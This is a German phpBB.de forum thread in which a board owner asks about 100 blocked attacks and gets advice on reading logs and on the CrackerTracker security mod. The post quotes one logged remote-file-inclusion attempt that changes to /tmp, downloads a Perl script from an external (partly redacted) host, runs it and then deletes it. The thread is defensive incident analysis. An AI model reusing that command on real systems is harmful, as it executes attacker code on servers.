phpBB.de

Hallo zusammen!

Heute morgen in der Zeit von 6 bis 12 Uhr wurde mein Board mit 100 Angriffen derselben Art von derselben IP-Adresse angegriffen.
(Bisher hatte ich gerade mal ~60 abgewehrte SPAM-Anmeldungen und ~10 abgewehrte Angriffsversuche mit chr(...), daher war ich heute mittag sehr überrascht, als der Counter plötzlich 100 Angriffe mehr anzeigte.)

Ich habe keine Ahnung, welche alte oder neue Sicherheitslücke er damit ausnutzen wollte, jedoch hat der CBACK CrackerTracker alles abgewehrt.

Jetzt würde mich natürlich interessieren, ob es sich hier um eine neue Lücke handeln könnte.

Hier mal ein Auszug aus der Wurm & Exploit Logdatei des CrackerTrackers:

217.69.231.27 hat geschrieben:c=http://--IP gelöscht--/x/tool25.txt?&cmd=cd%20/tmp/;GET%20http://home.arcor.de/--HP gelöscht--/xi.txt;perl%20xi.txt;rm%20-rf%20xi.txt*?

Edit cYbercOsmOnauT: Links mit Defacementscripten entfernt

Welche phpBB-Datei wurde denn versucht aufzurufen?

Ansonsten kannst du vielleicht mal die komplette Logzeile im Security Tracker melden.

h-o hat geschrieben:Welche phpBB-Datei wurde denn versucht aufzurufen?
[...]

Das gibt die Logdatei des CrackerTracker leider nicht her.
Logischerweise hat der Angreifer auch keinen Referer mitgeliefert, jedoch liefert er als UserAgent "Mozilla/5.0" mit.

Wie ich gerade in der Logdatei sehe, ist er seit 15:21 Uhr wieder aktiv.
Diesmal mit der IP-Adresse 193.124.133.230 bzw. 193.170.222.134
Wird alles schön brav geblockt.

Muss ich mir jetzt dennoch Sorgen machen?

[Edit: Ich kann erst morgen in den Server-Logs nach den IP-Adressen suchen, da mir mein Provider diese Dateien erst nach Mitternacht zur Verfügung stellt.]

Um die angriffdatei(en) zu finden kannst Du einfach den angehangenen String den CTracker protokolliert im Apache Log suchen, dann findest Du alle aktivtäten zu dieser Angriffsart.

cback hat geschrieben:Um die angriffdatei(en) zu finden kannst Du einfach den angehangenen String den CTracker protokolliert im Apache Log suchen, dann findest Du alle aktivtäten zu dieser Angriffsart.

Danke für die Info, aber wie schon gesagt, komme ich erst morgen an die Apache-Logfiles, da sie erst gegen Mitternacht für mich zugänglich gemacht werden.
Sobald sie mir vorliegen werde ich die Namen der angegriffenen Dateien zur Verfügung stellen.

Vielleicht hilft das Logfile etwas weiter:

[Link entfernt, da sich das Problem erledigt hat.]

Also wenn Du an Dein Apache Log kommst suche bitte diese 4 Dinge in Deinem Logfile und lasse mir die entsprechende Datei die versucht wurde zu Attackieren sowie den Logeintrag mit 2 Einträgen davor und danach am besten per PM oder Mail zukommen.

Habe Dir die Einträge auch per PM geschickt.

Dann kann ich mal sehen ob ich sagen kann was da versucht wurde und welche Risiken bestehen wenn man keinen CT hat.

Vielen Dank für die Unterstützung!
Nachdem sich nun herausgestellt hat, dass hier nur ein völlig ahnungsloses Scriptkiddie am Werk war kann ich wieder beruhigt(er) schlafen.
Mittlerweile habe ich auch die aktuelle Version des CBACK CrackterTracker (z. Zt. 4.1.5) installiert, obwohl ich keine Ahnung von PHP habe.
An dieser Stelle nochmals einen ausdrücklichen Dank an CBACK.

Bitte, gern geschehen.
Freut mich, dass Dir der MOD gefällt.

Ich lasse den Mod am besten noch heute einbauen, lebt sich echt gefährlich ohne den. Leider weigert sich mein sonst so treuer Techniker, das Ding reinzuhauen, deshalb musste ich jetzt einen Text in der Jobbörse machen. Aber wenn dieses Tool echt so genial funktionier, dann super Arbeit von cback! Dankeschön!